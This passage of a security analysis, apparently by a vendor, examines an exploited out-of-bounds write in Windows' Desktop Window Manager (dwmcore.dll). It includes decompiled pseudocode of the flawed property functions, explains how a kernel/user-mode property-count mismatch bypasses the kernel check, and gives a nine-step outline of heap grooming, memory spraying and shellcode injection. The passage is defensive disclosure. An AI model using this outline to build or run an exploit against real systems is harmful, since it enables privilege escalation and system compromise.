      }
 
      CPropertySet::UpdateProperty<D2DVector2>(this, propertyId, _D2DVector2, value);
    }
  }
 
  …
}
 
int CPropertySet::AddProperty<D2DVector2>(CResource *this, unsigned int propertyId, int storageOffset, int type, _QWORD *value)
{
  int propertyIdAdded;
 
  int result = PropertySetStorage<DynArrayNoZero,PropertySetUserModeAllocator>::AddProperty<D2DVector2>(
     this->propertiesData,
     type,
     value,
     &propertyIdAdded);
  if ( result < 0 )
  {
    return result;
  }
 
  if ( propertyId != propertyIdAdded || storageOffset != this->properties[propertyId]->offset & 0x1FFFFFFF )
  {
    return 0x88980403;
  }
 
  result = CPropertySet::PropertyUpdated<D2DMatrix>(this, propertyId);
  if ( result < 0 )
  {
    return result;
  }
 
  return 0;
}
 
int CPropertySet::UpdateProperty<D2DVector2>(CResource *this, unsigned int propertyId, int type, _QWORD *value)
{
  if ( this->properties[propertyId]->type == type )
  {
    *(_QWORD *)(this->propertiesData + (this->properties[propertyId]->offset & 0x1FFFFFFF)) = *value;
 
    int result = CPropertySet::PropertyUpdated<D2DMatrix>(this, propertyId);
    if ( result < 0 )
    {
      return result;
    }
 
    return 0;
  }
  else
  {
    return 0x80070057;
  }
}

Processing of the SetResourceBufferProperty (D2DVector2) command in dwmcore.dll

For the SetResourceBufferProperty command with the expression type set to D2DVector2, the function CPropertySet::ProcessSetPropertyValue(…) would either call CPropertySet::AddProperty<D2DVector2>(…) or CPropertySet::UpdateProperty<D2DVector2>(…) depending on whether the update flag is set in the command. The first thing that catches the eye is the way the new property is added in the CPropertySet::AddProperty<D2DVector2>(…) function. You can see that it adds a new property to the resource, but it only checks if the propertyId and storageOffset of a new property are equal to the provided values after the new property is added, and returns an error if that’s not the case. Checking something after a job is done is bad coding practice and can result in vulnerabilities. However, a real issue can be found in the CPropertySet::UpdateProperty<D2DVector2>(…) function. No check takes place that will ensure if the provided propertyId is less than the count of properties added to the resource. As a result, an attacker can use this function to perform an OOB write past the propertiesData buffer if it manages to bypass two additional checks for data inside the properties array.

(1) storageOffset == this->properties[propertyId]->offset & 0x1FFFFFFF(2) this->properties[propertyId]->type == type

Conditions which need to be met for exploitation in dwmcore.dll

These checks could be bypassed if an attacker is able to allocate and release objects in the dwm.exe process to groom heap into the desired state and spray memory at specific locations with fake properties. The discovered exploit manages to do this using the CreateResource, ReleaseResource and SetResourceBufferProperty commands.

At the time of writing, we still hadn’t analyzed the updated binaries that are fixing this vulnerability, but to exclude the possibility of other variants for this vulnerability Microsoft would need to check the count of properties for other expression types as well.

Even with the above issues in dwmcore.dll, if the desired memory state is achieved to bypass the previously mentioned checks and a batch of commands are issued to trigger the vulnerability, it still won’t be triggered because there is one more thing preventing it from happening.

As mentioned above, commands are first processed by the kernel and only after that are they sent to Desktop Window Manager (dwm.exe). This means that if you try to send a command with an invalid propertyId, NtDCompositionProcessChannelBatchBuffer syscall will return an error and the command will not be passed to the dwm.exe process. SetResourceBufferProperty commands with expression type set to D2DVector2 are processed in the win32kbase.sys driver with the functions DirectComposition::CPropertySetMarshaler::AddProperty<D2DVector2>(…) and DirectComposition::CPropertySetMarshaler::UpdateProperty<D2DVector2>(…), which are very similar to those present in dwmcore.dll (it’s quite likely they were copy-pasted). However, the kernel version of the UpdateProperty<D2DVector2> function has one notable difference – it actually checks the count of properties added to the resource.

DirectComposition::CPropertySetMarshaler::UpdateProperty<D2DVector2>(…) in win32kbase.sys

The check for propertiesCount in the kernel mode version of the UpdateProperty<D2DVector2> function prevents further processing of a malicious command by its user mode twin and mitigates the vulnerability, but this is where DirectComposition::CPropertySetMarshaler::AddProperty<D2DVector2>(…) comes in to play. The kernel version of the AddProperty<D2DVector2> function works exactly like its user mode variant and it also applies the same behavior of checking property after it has already been added and returns an error if propertyId and storageOffset of the created property do not match the provided values. Because of this, it’s possible to use the AddProperty<D2DVector2> function to add a new property and force the function to return an error and cause inconsistency between the number of properties assigned to the same resource in kernel mode/user mode. The propertiesCount check in the kernel could be bypassed this way and malicious commands would be passed to Desktop Window Manager (dwm.exe).

Inconsistency between the number of properties assigned to the same resource in kernel mode/user mode could be a source of other vulnerabilities, so we recommend Microsoft to change the behavior of the AddProperty function and check properties before they are added.

The whole exploitation process for the discovered exploit is as follows:

  1. Create a large number of resources with properties of specific size to get heap into predictable state.
  2. Create additional resources with properties of specific size and content to spray memory at specific locations with fake properties.
  3. Release resources created at stage 2.
  4. Create additional resources with properties. These resources will be used to perform OOB writes.
  5. Make holes among resources created at stage 1.
  6. Create additional properties for resources created at stage 4. Their buffers are expected to be allocated at specific locations.
  7. Create “special” properties to cause inconsistency between the number of properties assigned to the same resource in kernel mode/user mode for resources created at stage 4.
  8. Use OOB write vulnerability to write shellcode, create an object and get code execution.
  9. Inject additional shellcode into another system process.

Kaspersky products detect this exploit with the verdicts:

  • HEUR:Exploit.Win32.Generic
  • HEUR:Trojan.Win32.Generic
  • PDM:Exploit.Win32.Generic